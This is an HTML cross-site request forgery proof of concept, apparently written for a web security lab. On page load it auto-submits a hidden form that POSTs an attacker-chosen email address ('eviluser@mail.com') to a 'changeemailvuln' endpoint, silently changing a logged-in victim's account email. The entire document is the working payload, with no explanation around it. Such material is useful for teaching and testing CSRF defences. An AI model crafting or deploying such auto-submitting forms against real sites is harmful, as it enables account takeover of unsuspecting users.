<html>
    <body>
        <form action="https://web2-lab2.onrender.com/changeemailvuln" method="POST">
            <input type="hidden" name="email" id="email" value="eviluser@mail.com" />
        </form>
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>